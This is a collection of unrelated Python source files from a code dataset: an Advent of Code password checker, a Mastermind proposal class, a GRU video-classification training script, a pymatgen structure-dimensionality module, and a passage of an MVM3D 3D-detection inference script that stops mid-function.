StarcoderdataPython
|
1700577
|
<filename>day04/part1.py
import re
def test_num(num):
str_num = str(num)
if re.search("(1{2}|2{2}|3{2}|4{2}|5{2}|6{2}|7{2}|8{2}|9{2}|0{2})", str_num) == None:
return False
return list(str_num) == sorted(str_num)
def process(start, end):
count = 0
for num in range(start, end + 1):
if test_num(num):
print(f'Num passed {num}')
count += 1
print(f'Valid password count {count}')
return count
def main():
process(235741, 706948)
if __name__ == "__main__":
main()
|
StarcoderdataPython
|
78656
|
#!/usr/bin/env python3.7
class Proposal:
"""
Sequence proposed by the player while trying to guess the secret
The problem will add hint information, by setting the value of whites and reds
"""
"""proposed secret sequence"""
sequence = str
"""number of right colours in a wrong position"""
whites = int
"""number of right colours in the correct position"""
reds = int
def __init__(self, sequence):
"""
Create a proposal
:param sequence: secret sequence proposed by the player
"""
self.sequence = sequence
|
StarcoderdataPython
|
1665931
|
"""
********************************
* Created by mohammed-alaa *
********************************
Here I'm training video level network based on recurrent networks(frames from CNN are concatenated into a 3d tensor and feed to RNN):
1. setting configs (considering concatenation will have feature of 4096 = 2048 *2)
2. generating experiment_identifier and creating files
3. downloading pickled data from drive each pickled file is a big numpy array whose shape is [instances, samples per video,features(2048 or 4096) ]
"""
import glob
import pickle
import random
import shutil
from tensorflow.keras import backend as K
from tensorflow.python.keras import Model
from tensorflow.python.keras.layers import Dense, Softmax, GRU
import utils.training_utils as eval_globals
from evaluation.evaluation import *
from utils import log
from utils.drive_manager import DriveManager
################################################################################
"""Configs"""
lr = 1e-6
hidden_state = 128
feature_field = 2048
testing_samples_per_video = 19
epochs = 1000
save_every = 25
batch_size = 64
num_training_samples = 9537
num_testing_samples = 3783
is_spatial = True
is_motion = True
if is_spatial and is_motion:
feature_field *= 2
################################################################################
"""Files, paths & identifier"""
suffix = "" # put your name or anything :D
experiment_identifier = suffix + "recurrent_fusion_selu_atten_simple" + str(lr)
################
log_file = experiment_identifier + ".log"
log_stream = open(log_file, "a")
checkpoint_dir = "./fusion/"
checkpoints = checkpoint_dir + "fusion_chk"
try:
shutil.rmtree(checkpoint_dir)
except:
pass
drive_manager = DriveManager(experiment_identifier)
checkpoint_found, zip_file_name = drive_manager.get_latest_snapshot()
################################################################################
"""sanity check"""
if not is_motion and not is_spatial:
exit()
################################################################################
"""Downloads the files and makes sure files aren't re-downloaded with every run if no one is missed"""
if is_spatial:
drive_manager_spatial = DriveManager("spatial_feature_dataset")
test_spatial = drive_manager_spatial.search_file("test_features_spatial.pickle")
train_spatial = drive_manager_spatial.search_file("train_features_spatial.pickle")
if len(test_spatial) == 0:
print("Please run 'generate_spatial_feature_dataset.py' and generate 'test_features_spatial.pickle'..this file will be saved to your drive in '<YOUR FOLDER:{}>/spatial_feature_dataset'".format(drive_manager_spatial.personal_dfolder))
exit()
if len(train_spatial) == 0:
print("Please run 'generate_spatial_feature_dataset.py' and generate 'train_features_spatial.pickle'..those files will be saved to your drive in '<YOUR FOLDER:{}>/spatial_feature_dataset'".format(drive_manager_spatial.personal_dfolder))
exit()
drive_manager_spatial.download_file(test_spatial[0]["id"], "test_features_spatial.pickle", unzip=False)
if len(glob.glob("train_features_spatial.pickle*")) != len(train_spatial):
drive_manager_spatial.download_files_list(train_spatial, False, False)
if is_motion:
drive_manager_motion = DriveManager("motion_feature_dataset")
test_motion= drive_manager_motion.search_file("test_features_motion.pickle")
train_motion = drive_manager_motion.search_file("train_features_motion.pickle")
if len(test_motion) == 0:
print("Please run 'generate_motion_feature_dataset.py' and generate 'test_features_motion.pickle'..this file will be saved to your drive in '<YOUR FOLDER:{}>/motion_feature_dataset'".format(drive_manager_motion.personal_dfolder))
exit()
if len(train_motion) == 0:
print("Please run 'generate_motion_feature_dataset.py' and generate 'train_features_motion.pickle'..those files will be saved to your drive in '<YOUR FOLDER:{}>/motion_feature_dataset'".format(drive_manager_motion.personal_dfolder))
exit()
drive_manager_motion.download_file(test_motion[0]["id"], "test_features_motion.pickle", unzip=False)
if len(glob.glob("train_features_motion.pickle*")) != len(train_motion):
drive_manager_motion.download_files_list(train_motion, False, False)
################################################################################
seen_spatial_files = set()
seen_motion_files = set()
def train_generator():
while True:
train_samples_spatial, train_labels_spatial, train_samples_motion, train_labels_motion = [0] * 4
"""Choose file to read while being downloaded then read files"""
"""load spatial data"""
if is_spatial:
spatial_features_files = glob.glob("train_features_spatial.pickle*")
if len(spatial_features_files) == len(seen_spatial_files):
seen_spatial_files.clear()
while True:
spatial_features_file = random.sample(spatial_features_files, k=1)[0]
if spatial_features_file not in seen_spatial_files:
try:
with open(spatial_features_file, 'rb') as f:
train_samples_spatial, train_labels_spatial = pickle.load(f)
# print("chose:", spatial_features_file)
seen_spatial_files.add(spatial_features_file)
break
except:
pass
"""load motion data"""
if is_motion:
motion_features_files = glob.glob("train_features_motion.pickle*")
if len(motion_features_files) == len(seen_motion_files):
seen_motion_files.clear()
while True:
motion_features_file = random.sample(motion_features_files, k=1)[0]
if motion_features_file not in seen_motion_files:
try:
with open(motion_features_file, 'rb') as f:
train_samples_motion, train_labels_motion = pickle.load(f)
# print("chose:", motion_features_file)
seen_motion_files.add(motion_features_file)
break
except:
pass
"""generation loop"""
permutation = list(range((num_training_samples + batch_size - 1) // batch_size))
random.shuffle(permutation)
if is_spatial != is_motion: # xor
# single stream motion or spatial
if is_spatial:
train_samples, train_labels = train_samples_spatial, train_labels_spatial
assert train_samples_spatial.shape[0] == num_training_samples
else:
train_samples, train_labels = train_samples_motion, train_labels_motion
assert train_samples_motion.shape[0] == num_training_samples
for batch_index in permutation:
yield train_samples[batch_index * batch_size:(batch_index + 1) * batch_size], train_labels[batch_index * batch_size:(batch_index + 1) * batch_size]
else:
# concatenate samples from motion and spatial
assert np.allclose(train_labels_spatial, train_labels_motion)
assert train_samples_spatial.shape[0] == num_training_samples
assert train_samples_motion.shape[0] == num_training_samples
for batch_index in permutation:
yield np.concatenate([train_samples_spatial[batch_index * batch_size:(batch_index + 1) * batch_size], train_samples_motion[batch_index * batch_size:(batch_index + 1) * batch_size]], axis=2), train_labels_spatial[batch_index * batch_size:(batch_index + 1) * batch_size]
def test_generator():
"""load spatial test data"""
if is_spatial:
with open("test_features_spatial.pickle", 'rb') as f:
test_samples_spatial, test_labels_spatial = pickle.load(f)
"""load motion test data"""
if is_motion:
with open("test_features_motion.pickle", 'rb') as f:
test_samples_motion, test_labels_motion = pickle.load(f)
while True:
if is_spatial != is_motion: # xor
# single stream motion or spatial
if is_spatial:
# noinspection PyUnboundLocalVariable
test_samples, test_labels = test_samples_spatial, test_labels_spatial
assert test_samples_spatial.shape[0] == num_testing_samples
else:
# noinspection PyUnboundLocalVariable
test_samples, test_labels = test_samples_motion, test_labels_motion
assert test_samples_motion.shape[0] == num_testing_samples
for batch_index in range((test_samples.shape[0] + batch_size - 1) // batch_size):
yield test_samples[batch_index * batch_size:(batch_index + 1) * batch_size], test_labels[batch_index * batch_size:(batch_index + 1) * batch_size]
else:
# concatenate samples from motion and spatial
assert np.allclose(test_labels_motion, test_labels_spatial)
assert test_samples_spatial.shape[0] == num_testing_samples
assert test_samples_motion.shape[0] == num_testing_samples
for batch_index in range((num_testing_samples + batch_size - 1) // batch_size):
yield np.concatenate([test_samples_spatial[batch_index * batch_size:(batch_index + 1) * batch_size], test_samples_motion[batch_index * batch_size:(batch_index + 1) * batch_size]], axis=2), test_labels_spatial[batch_index * batch_size:(batch_index + 1) * batch_size]
class saver_callback(tf.keras.callbacks.Callback):
"""
save checkpoint with tensorflow saver not h5py since my model implementation is supclass api not function >> function implementation is left as TODO
also logging model state and uploading the file
"""
def on_epoch_end(self, epoch, logs={}):
epoch_one_based = epoch + 1
if epoch_one_based % save_every == 0 and epoch_one_based > 0:
log("=" * 100 + "\n(Training:)Epoch", epoch_one_based, "prec@1", logs["acc_top_1"], "prec@5", logs["acc_top_5"], "loss", logs["loss"], file=log_stream)
log("(Validation:)Epoch", epoch_one_based, "prec@1", logs["val_acc_top_1"], "prec@5", logs["val_acc_top_5"], "loss", logs["val_loss"], file=log_stream)
if logs["val_acc_top_1"] > eval_globals.best_video_level_accuracy_1:
log("Epoch", epoch_one_based, "Established new baseline:", logs["val_acc_top_1"], file=log_stream)
eval_globals.best_video_level_accuracy_1 = logs["val_acc_top_1"]
# save the model and pickle
#
else:
log("Epoch", epoch_one_based, "Baseline:", eval_globals.best_video_level_accuracy_1, "but got:", logs["val_acc_top_1"], file=log_stream)
saver.save(tf.keras.backend.get_session(), checkpoints)
drive_manager.upload_project_files(
files_list=[log_file],
dir_list=[checkpoint_dir],
snapshot_name=str(epoch_one_based) + "-" + "{0:.5f}".format(eval_globals.best_video_level_accuracy_1) + "-" + "{0:.5f}".format(logs["val_acc_top_1"]))
class Model(tf.keras.Model):
def __init__(self):
super(Model, self).__init__()
self.gru_1 = GRU(hidden_state, return_sequences=True, input_shape=(testing_samples_per_video, feature_field), dropout=.5) # recurrent layer
# self.gru_2 = GRU(hidden_state, return_sequences=True)
self.attention_layer = Dense(1) # gets attention weight for time step
self.attention_normalizer = Softmax(axis=1) # normalizes the 3d tensor to give weight for each time step
self.FC_1 = Dense(hidden_state // 2, activation='selu')
# recurrent_fusion_model.add(BatchNormalization())
# self.FC_2 = Dense(hidden_state // 4, activation='selu')
# self.BN_1 = BatchNormalization()
self.classification_layer = Dense(num_actions, activation='softmax')
def call(self, input_visual_feature, training=None, mask=None):
internal = self.gru_1(input_visual_feature) # returns a sequence of vectors of dimension feature_field
# in self attention i will return_sequences of course
# internal = self.gru_2(internal) # returns a sequence of vectors of dimension feature_field
un_normalized_attention_weights = self.attention_layer(internal)
normalized_attention_weights = self.attention_normalizer(un_normalized_attention_weights) # normalize on timesteps dimension
internal = normalized_attention_weights * internal
print(internal)
attention_vector = K.sum(internal, axis=1) # sum on timesteps
print(attention_vector)
# recurrent_fusion_model.add(Dense(hidden_state // 2, activation='relu'))
# recurrent_fusion_model.add(BatchNormalization())
internal = self.FC_1(attention_vector)
# internal = self.FC_2(internal)
final_output = self.classification_layer(internal)
return final_output
# create the model
recurrent_fusion_model = Model()
recurrent_fusion_model.compile(optimizer=keras.optimizers.Adam(lr=lr), loss=sparse_categorical_cross_entropy_loss, metrics=[acc_top_1, acc_top_5])
# build internal tensors
recurrent_fusion_model.fit(*next(train_generator()), batch_size=1, epochs=1, verbose=0)
# get tensorflow saver ready > will be used if a checkpoint found on drive
saver = tf.train.Saver(recurrent_fusion_model.variables)
if checkpoint_found:
# restore the model from the checkpoint
log("Model restored")
eval_globals.best_video_level_accuracy_1 = float(zip_file_name.split("-")[1])
log("Current Best", eval_globals.best_video_level_accuracy_1)
saver.restore(tf.keras.backend.get_session(), checkpoints) # use tensorflow saver
initial_epoch = int(zip_file_name.split("-")[0]) # get epoch number
else:
# init the model from scratch, it's already done
log("Starting from scratch")
# expected input data shape: (batch_size, timesteps, data_dim)
recurrent_fusion_model.summary()
initial_epoch = 0
# training
recurrent_fusion_model.fit_generator(train_generator(),
epochs=epochs, steps_per_epoch=(num_training_samples + batch_size - 1) // batch_size,
validation_data=test_generator(), validation_steps=(num_testing_samples + batch_size - 1) // batch_size,
callbacks=[saver_callback(), keras.callbacks.ReduceLROnPlateau(monitor='val_loss', patience=50, verbose=1, min_lr=lr / 10)],
initial_epoch=initial_epoch)
|
StarcoderdataPython
|
153063
|
"""
This module provides functions to get the dimensionality of a structure.
A number of different algorithms are implemented. These are based on the
following publications:
get_dimensionality_larsen:
- <NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
get_dimensionality_cheon:
- <NAME>.; <NAME>.; <NAME>.; <NAME>.; Reed,
<NAME>. Data Mining for New Two- and One-Dimensional Weakly Bonded Solids
and Lattice-Commensurate Heterostructures. Nano Lett. 2017.
get_dimensionality_gorai:
- <NAME>., <NAME>. & <NAME>. Computational Identification of
Promising Thermoelectric Materials Among Known Quasi-2D Binary Compounds.
J. Mater. Chem. A 2, 4136 (2016).
"""
import copy
import itertools
from collections import defaultdict
import numpy as np
from networkx.readwrite import json_graph
from pymatgen.analysis.graphs import MoleculeGraph, StructureGraph
from pymatgen.analysis.local_env import JmolNN
from pymatgen.analysis.structure_analyzer import get_max_bond_lengths
from pymatgen.core.lattice import get_integer_index
from pymatgen.core.periodic_table import Specie
from pymatgen.core.structure import Structure, Molecule
from pymatgen.core.surface import SlabGenerator
from pymatgen.symmetry.analyzer import SpacegroupAnalyzer
__author__ = "<NAME>, <NAME>, <NAME>"
def get_dimensionality_larsen(bonded_structure):
"""
Gets the dimensionality of a bonded structure.
The dimensionality of the structure is the highest dimensionality of all
structure components. This method is very robust and can handle
many tricky structures, regardless of structure type or improper connections
due to periodic boundary conditions.
Requires a StructureGraph object as input. This can be generated using one
of the NearNeighbor classes. For example, using the CrystalNN class::
bonded_structure = CrystalNN().get_bonded_structure(structure)
Based on the modified breadth-first-search algorithm described in:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
Returns:
(int): The dimensionality of the structure.
"""
return max([c['dimensionality'] for c in
get_structure_components(bonded_structure)])
def get_structure_components(bonded_structure, inc_orientation=False,
inc_site_ids=False, inc_molecule_graph=False):
"""
Gets information on the components in a bonded structure.
Correctly determines the dimensionality of all structures, regardless of
structure type or improper connections due to periodic boundary conditions.
Requires a StructureGraph object as input. This can be generated using one
of the NearNeighbor classes. For example, using the CrystalNN class::
bonded_structure = CrystalNN().get_bonded_structure(structure)
Based on the modified breadth-first-search algorithm described in:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
inc_orientation (bool, optional): Whether to include the orientation
of the structure component. For surfaces, the miller index is given,
for one-dimensional structures, the direction of the chain is given.
inc_site_ids (bool, optional): Whether to include the site indices
of the sites in the structure component.
inc_molecule_graph (bool, optional): Whether to include MoleculeGraph
objects for zero-dimensional components.
Returns:
(list of dict): Information on the components in a structure as a list
of dictionaries with the keys:
- "structure_graph": A pymatgen StructureGraph object for the
component.
- "dimensionality": The dimensionality of the structure component as an
int.
- "orientation": If inc_orientation is `True`, the orientation of the
component as a tuple. E.g. (1, 1, 1)
- "site_ids": If inc_site_ids is `True`, the site indices of the
sites in the component as a tuple.
- "molecule_graph": If inc_molecule_graph is `True`, the site a
MoleculeGraph object for zero-dimensional components.
"""
import networkx as nx # optional dependency therefore not top level import
comp_graphs = (bonded_structure.graph.subgraph(c) for c in
nx.weakly_connected_components(bonded_structure.graph))
components = []
for graph in comp_graphs:
dimensionality, vertices = calculate_dimensionality_of_site(
bonded_structure, list(graph.nodes())[0], inc_vertices=True)
component = {'dimensionality': dimensionality}
if inc_orientation:
if dimensionality in [1, 2]:
vertices = np.array(vertices)
g = vertices.sum(axis=0) / vertices.shape[0]
# run singular value decomposition
_, _, vh = np.linalg.svd(vertices - g)
# get direction (first column is best fit line,
# 3rd column is unitary norm)
index = 2 if dimensionality == 2 else 0
orientation = get_integer_index(vh[index, :])
else:
orientation = None
component['orientation'] = orientation
if inc_site_ids:
component['site_ids'] = tuple(graph.nodes())
if inc_molecule_graph and dimensionality == 0:
component['molecule_graph'] = zero_d_graph_to_molecule_graph(
bonded_structure, graph)
component_structure = Structure.from_sites(
[bonded_structure.structure[n] for n in sorted(graph.nodes())])
sorted_graph = nx.convert_node_labels_to_integers(
graph, ordering="sorted")
component_graph = StructureGraph(
component_structure,
graph_data=json_graph.adjacency_data(sorted_graph))
component['structure_graph'] = component_graph
components.append(component)
return components
def calculate_dimensionality_of_site(bonded_structure, site_index,
inc_vertices=False):
"""
Calculates the dimensionality of the component containing the given site.
Implements directly the modified breadth-first-search algorithm described in
Algorithm 1 of:
<NAME>, <NAME>, <NAME>, <NAME>. Definition of a
scoring parameter to identify low-dimensional materials components.
Phys. Rev. Materials 3, 034003 (2019).
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
site_index (int): The index of a site in the component of interest.
inc_vertices (bool, optional): Whether to return the vertices (site
images) of the component.
Returns:
(int or tuple): If inc_vertices is False, the dimensionality of the
component will be returned as an int. If inc_vertices is true, the
function will return a tuple of (dimensionality, vertices), where
vertices is a list of tuples. E.g. [(0, 0, 0), (1, 1, 1)].
"""
def neighbours(comp_index):
return [(s.index, s.jimage) for s
in bonded_structure.get_connected_sites(comp_index)]
def rank(vertices):
if len(vertices) == 0:
return -1
if len(vertices) == 1:
return 0
vertices = np.array(list(vertices))
return np.linalg.matrix_rank(vertices[1:] - vertices[0])
def rank_increase(seen, candidate):
rank0 = len(seen) - 1
rank1 = rank(seen.union({candidate}))
return rank1 > rank0
connected_sites = {i: neighbours(i) for i in
range(bonded_structure.structure.num_sites)}
seen_vertices = set()
seen_comp_vertices = defaultdict(set)
queue = [(site_index, (0, 0, 0))]
while len(queue) > 0:
comp_i, image_i = queue.pop(0)
if (comp_i, image_i) in seen_vertices:
continue
seen_vertices.add((comp_i, image_i))
if not rank_increase(seen_comp_vertices[comp_i], image_i):
continue
seen_comp_vertices[comp_i].add(image_i)
for comp_j, image_j in connected_sites[comp_i]:
image_j = tuple(np.add(image_j, image_i))
if (comp_j, image_j) in seen_vertices:
continue
if rank_increase(seen_comp_vertices[comp_j], image_j):
queue.append((comp_j, image_j))
if inc_vertices:
return (rank(seen_comp_vertices[site_index]),
list(seen_comp_vertices[site_index]))
return rank(seen_comp_vertices[site_index])
def zero_d_graph_to_molecule_graph(bonded_structure, graph):
"""
Converts a zero-dimensional networkx Graph object into a MoleculeGraph.
Implements a similar breadth-first search to that in
calculate_dimensionality_of_site().
Args:
bonded_structure (StructureGraph): A structure with bonds, represented
as a pymatgen structure graph. For example, generated using the
CrystalNN.get_bonded_structure() method.
graph (nx.Graph): A networkx `Graph` object for the component of
interest.
Returns:
(MoleculeGraph): A MoleculeGraph object of the component.
"""
import networkx as nx
seen_indices = []
sites = []
start_index = list(graph.nodes())[0]
queue = [(start_index, (0, 0, 0),
bonded_structure.structure[start_index])]
while len(queue) > 0:
comp_i, image_i, site_i = queue.pop(0)
if comp_i in [x[0] for x in seen_indices]:
raise ValueError("Graph component is not 0D")
seen_indices.append((comp_i, image_i))
sites.append(site_i)
for site_j in bonded_structure.get_connected_sites(
comp_i, jimage=image_i):
if ((site_j.index, site_j.jimage) not in seen_indices and
(site_j.index, site_j.jimage, site_j.site) not in queue):
queue.append((site_j.index, site_j.jimage, site_j.site))
# sort the list of indices and the graph by index to make consistent
indices_ordering = np.argsort([x[0] for x in seen_indices])
sorted_sites = np.array(sites, dtype=object)[indices_ordering]
sorted_graph = nx.convert_node_labels_to_integers(graph, ordering="sorted")
mol = Molecule([s.specie for s in sorted_sites],
[s.coords for s in sorted_sites])
mol_graph = MoleculeGraph.with_edges(mol, nx.Graph(sorted_graph).edges())
return mol_graph
def get_dimensionality_cheon(structure_raw, tolerance=0.45,
ldict=JmolNN().el_radius, standardize=True, larger_cell=False):
"""
Algorithm for finding the dimensions of connected subunits in a structure.
This method finds the dimensionality of the material even when the material
is not layered along low-index planes, or does not have flat
layers/molecular wires.
Author: "<NAME>"
Email: "<EMAIL>"
See details at :
<NAME>.; <NAME>.; <NAME>.; <NAME>.; Reed,
<NAME>. Data Mining for New Two- and One-Dimensional Weakly Bonded Solids and
Lattice-Commensurate Heterostructures. Nano Lett. 2017.
Args:
structure_raw (Structure): A pymatgen Structure object.
tolerance (float): length in angstroms used in finding bonded atoms.
Two atoms are considered bonded if (radius of atom 1) + (radius of
atom 2) + (tolerance) < (distance between atoms 1 and 2). Default
value = 0.45, the value used by JMol and Cheon et al.
ldict (dict): dictionary of bond lengths used in finding bonded atoms.
Values from JMol are used as default
standardize: works with conventional standard structures if True. It is
recommended to keep this as True.
larger_cell: tests with 3x3x3 supercell instead of 2x2x2. Testing with
2x2x2 supercell is faster but misclssifies rare interpenetrated 3D
structures. Testing with a larger cell circumvents this problem
Returns:
(str): dimension of the largest cluster as a string. If there are ions
or molecules it returns 'intercalated ion/molecule'
"""
if standardize:
structure = SpacegroupAnalyzer(structure_raw).get_conventional_standard_structure()
else:
structure = structure_raw
structure_save = copy.copy(structure_raw)
connected_list1 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max1, min1, clusters1 = find_clusters(structure, connected_list1)
if larger_cell:
structure.make_supercell([[3, 0, 0], [0, 3, 0], [0, 0, 3]])
connected_list3 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max3, min3, clusters3 = find_clusters(structure, connected_list3)
if min3 == min1:
if max3 == max1:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max3) / max1) / np.log2(3)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
return None
else:
structure.make_supercell([[2, 0, 0], [0, 2, 0], [0, 0, 2]])
connected_list2 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max2, min2, clusters2 = find_clusters(structure, connected_list2)
if min2 == 1:
dim = 'intercalated ion'
elif min2 == min1:
if max2 == max1:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max2) / max1)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
structure = copy.copy(structure_save)
structure.make_supercell([[3, 0, 0], [0, 3, 0], [0, 0, 3]])
connected_list3 = find_connected_atoms(structure, tolerance=tolerance, ldict=ldict)
max3, min3, clusters3 = find_clusters(structure, connected_list3)
if min3 == min2:
if max3 == max2:
dim = '0D'
else:
dim = 'intercalated molecule'
else:
dim = np.log2(float(max3) / max1) / np.log2(3)
if dim == int(dim):
dim = str(int(dim)) + 'D'
else:
return None
return dim
def find_connected_atoms(struct, tolerance=0.45, ldict=JmolNN().el_radius):
"""
Finds bonded atoms and returns a adjacency matrix of bonded atoms.
Author: "<NAME>"
Email: "<EMAIL>"
Args:
struct (Structure): Input structure
tolerance: length in angstroms used in finding bonded atoms. Two atoms
are considered bonded if (radius of atom 1) + (radius of atom 2) +
(tolerance) < (distance between atoms 1 and 2). Default
value = 0.45, the value used by JMol and Cheon et al.
ldict: dictionary of bond lengths used in finding bonded atoms. Values
from JMol are used as default
Returns:
(np.ndarray): A numpy array of shape (number of atoms, number of atoms);
If any image of atom j is bonded to atom i with periodic boundary
conditions, the matrix element [atom i, atom j] is 1.
"""
# pylint: disable=E1136
n_atoms = len(struct.species)
fc = np.array(struct.frac_coords)
fc_copy = np.repeat(fc[:, :, np.newaxis], 27, axis=2)
neighbors = np.array(list(itertools.product([0, 1, -1], [0, 1, -1], [0, 1, -1]))).T
neighbors = np.repeat(neighbors[np.newaxis, :, :], 1, axis=0)
fc_diff = fc_copy - neighbors
species = list(map(str, struct.species))
# in case of charged species
for i, item in enumerate(species):
if item not in ldict.keys():
species[i] = str(Specie.from_string(item).element)
latmat = struct.lattice.matrix
connected_matrix = np.zeros((n_atoms, n_atoms))
for i in range(n_atoms):
for j in range(i + 1, n_atoms):
max_bond_length = ldict[species[i]] + ldict[species[j]] + tolerance
frac_diff = fc_diff[j] - fc_copy[i]
distance_ij = np.dot(latmat.T, frac_diff)
# print(np.linalg.norm(distance_ij,axis=0))
if sum(np.linalg.norm(distance_ij, axis=0) < max_bond_length) > 0:
connected_matrix[i, j] = 1
connected_matrix[j, i] = 1
return connected_matrix
def find_clusters(struct, connected_matrix):
"""
Finds bonded clusters of atoms in the structure with periodic boundary
conditions.
If there are atoms that are not bonded to anything, returns [0,1,0]. (For
faster computation time)
Author: "<NAME>"
Email: "<EMAIL>"
Args:
struct (Structure): Input structure
connected_matrix: Must be made from the same structure with
find_connected_atoms() function.
Returns:
max_cluster: the size of the largest cluster in the crystal structure
min_cluster: the size of the smallest cluster in the crystal structure
clusters: list of bonded clusters found here, clusters are formatted as
sets of indices of atoms
"""
n_atoms = len(struct.species)
if n_atoms == 0:
return [0, 0, 0]
if 0 in np.sum(connected_matrix, axis=0):
return [0, 1, 0]
cluster_sizes = []
clusters = []
visited = [False for item in range(n_atoms)]
connected_matrix += np.eye(len(connected_matrix))
def visit(atom, atom_cluster):
visited[atom] = True
new_cluster = set(np.where(connected_matrix[atom] != 0)[0]).union(atom_cluster)
atom_cluster = new_cluster
for new_atom in atom_cluster:
if not visited[new_atom]:
visited[new_atom] = True
atom_cluster = visit(new_atom, atom_cluster)
return atom_cluster
for i in range(n_atoms):
if not visited[i]:
atom_cluster = set()
cluster = visit(i, atom_cluster)
clusters.append(cluster)
cluster_sizes.append(len(cluster))
max_cluster = max(cluster_sizes)
min_cluster = min(cluster_sizes)
return [max_cluster, min_cluster, clusters]
def get_dimensionality_gorai(structure, max_hkl=2, el_radius_updates=None,
min_slab_size=5, min_vacuum_size=5,
standardize=True, bonds=None):
"""
This method returns whether a structure is 3D, 2D (layered), or 1D (linear
chains or molecules) according to the algorithm published in <NAME>.,
<NAME>. & <NAME>. Computational Identification of Promising
Thermoelectric Materials Among Known Quasi-2D Binary Compounds. J. Mater.
Chem. A 2, 4136 (2016).
Note that a 1D structure detection might indicate problems in the bonding
algorithm, particularly for ionic crystals (e.g., NaCl)
Users can change the behavior of bonds detection by passing either
el_radius_updates to update atomic radii for auto-detection of max bond
distances, or bonds to explicitly specify max bond distances for atom pairs.
Note that if you pass both, el_radius_updates are ignored.
Args:
structure: (Structure) structure to analyze dimensionality for
max_hkl: (int) max index of planes to look for layers
el_radius_updates: (dict) symbol->float to update atomic radii
min_slab_size: (float) internal surface construction parameter
min_vacuum_size: (float) internal surface construction parameter
standardize (bool): whether to standardize the structure before
analysis. Set to False only if you already have the structure in a
convention where layers / chains will be along low <hkl> indexes.
bonds ({(specie1, specie2): max_bond_dist}: bonds are
specified as a dict of tuples: float of specie1, specie2
and the max bonding distance. For example, PO4 groups may be
defined as {("P", "O"): 3}.
Returns: (int) the dimensionality of the structure - 1 (molecules/chains),
2 (layered), or 3 (3D)
"""
if standardize:
structure = SpacegroupAnalyzer(structure). \
get_conventional_standard_structure()
if not bonds:
bonds = get_max_bond_lengths(structure, el_radius_updates)
num_surfaces = 0
for h in range(max_hkl):
for k in range(max_hkl):
for l in range(max_hkl):
if max([h, k, l]) > 0 and num_surfaces < 2:
sg = SlabGenerator(structure, (h, k, l),
min_slab_size=min_slab_size,
min_vacuum_size=min_vacuum_size)
slabs = sg.get_slabs(bonds)
for _ in slabs:
num_surfaces += 1
return 3 - min(num_surfaces, 2)
|
StarcoderdataPython
|
125805
|
<filename>codes/infer.py<gh_stars>10-100
import math
import torch.nn.functional as F
import matplotlib
import sys
from codes.evaluation.pyeval.calAOS import evaluateDetectionAPAOS
from codes.evaluation.evaluate import evaluate
from codes.utils import array_tool as at
from torchvision.ops import boxes as box_ops
import time
import cv2
import os
from codes.EX_CONST import Const
import numpy as np
import torch
import torchvision.transforms as T
from codes.models.persp_trans_detector import PerspTransDetector
from codes.utils.image_utils import img_color_denormalize
from codes.datasets.MVM3D import MVM3D
from codes.datasets.MVM3D_loader import MVM3D_loader
from codes.models.MbonHead import MbonHead
import argparse
os.environ['OMP_NUM_THREADS'] = '1'
matplotlib.use('Agg')
sys.path.append("../..")
class BaseTrainer(object):
def __init__(self):
super(BaseTrainer, self).__init__()
class Inferer(BaseTrainer):
def __init__(self, model, roi_head, denormalize):
self.model = model
self.roi_head = roi_head
self.denormalize = denormalize
self.bins = Const.bins
def infer(self, data_loader):
all_pred_res = []
all_gt_res = []
for batch_idx, data in enumerate(data_loader):
imgs, bev_xy, bev_angle, gt_bbox, gt_left_bbox, gt_right_bbox, left_dirs, right_dirs, left_sincos, right_sincos, left_orientation, right_orientation, left_conf, right_conf, frame, extrin, intrin, mark = data
with torch.no_grad():
rpn_locs, rpn_scores, anchor, rois, roi_indices, img_featuremaps, bev_featuremaps = self.model(imgs, frame, mark=mark)
roi = torch.tensor(rois)
# -----------Projection------------
roi_3d = generate_3d_bbox(roi)
left_2d_bbox = getprojected_3dbox(roi_3d, extrin, intrin, isleft=True)
right_2d_bbox = getprojected_3dbox(roi_3d, extrin, intrin, isleft=False)
left_2d_bbox = get_outter(left_2d_bbox)
right_2d_bbox = get_outter(right_2d_bbox)
left_index_inside = np.where(
(left_2d_bbox[:, 0] >= 0) &
(left_2d_bbox[:, 1] >= 0) &
(left_2d_bbox[:, 2] <= Const.ori_img_height) &
(left_2d_bbox[:, 3] <= Const.ori_img_width)
)[0]
right_index_inside = np.where(
(right_2d_bbox[:, 0] >= 0) &
(right_2d_bbox[:, 1] >= 0) &
(right_2d_bbox[:, 2] <= Const.ori_img_height) &
(right_2d_bbox[:, 3] <= Const.ori_img_width)
)[0]
if len(right_index_inside) == 0 or len(left_index_inside) == 0:
continue
left_2d_bbox = left_2d_bbox[left_index_inside]
right_2d_bbox = right_2d_bbox[right_index_inside]
left_rois_indices = roi_indices[left_index_inside]
right_rois_indices = roi_indices[right_index_inside]
left_2d_bbox = torch.tensor(left_2d_bbox)
right_2d_bbox = torch.tensor(right_2d_bbox)
# ------------MBON-----------
left_roi_cls_loc, left_roi_score, left_pred_orientation, left_pred_conf = self.roi_head(
img_featuremaps[0],
torch.tensor(left_2d_bbox).to(img_featuremaps[0].device),
left_rois_indices)
right_roi_cls_loc, right_roi_score, right_pred_orientation, right_pred_conf = self.roi_head(
img_featuremaps[1],
torch.tensor(right_2d_bbox).to(img_featuremaps[1].device),
right_rois_indices)
angle_bins = generate_bins(self.bins)
